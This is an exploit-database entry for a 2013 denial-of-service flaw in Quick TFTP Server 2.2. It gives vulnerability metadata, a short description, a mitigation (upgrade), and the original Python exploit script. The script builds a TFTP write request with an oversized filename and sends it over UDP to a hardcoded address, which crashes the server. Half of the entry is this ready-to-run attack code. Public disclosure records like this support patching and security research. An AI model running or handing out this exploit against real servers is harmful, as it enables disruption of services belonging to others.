Quick TFTP Server 2.2 DoS

vendor:

Quick TFTP Server

by:

npn

7,8

CVSS

HIGH

Denial of Service

CWE

Product Name: Quick TFTP Server

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: YES

Related CWE: N/A

CPE: a:tall_soft:quick_tftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 English

2013

A denial of service vulnerability exists in Quick TFTP Server 2.2 due to a lack of proper input validation. An attacker can send a specially crafted packet with a large file name to the server, causing the application to crash.

Mitigation:

Upgrade to the latest version of Quick TFTP Server.

Source

Exploit-DB raw data:

#!/usr/bin/python
 
#Exploit Title: Quick TFTP Server 2.2 DoS
#Date: 6th June 2013
#Exploit Author: npn
#Exploit Author Homepage: http://www.iodigitalsec.com/
#Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-quick-tftp-server-2-2/
#Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
#Software Link: http://www.tallsoft.com/tftpserver_setup.exe
#Version: 2.2
#Tested on: Windows XP SP3 English

from socket import *
import sys
import select

pwn = "\x00\x02"
pwn += "\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"
pwn += "A"*1200
pwn += "\x00"

address = ('192.168.200.20', 69)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)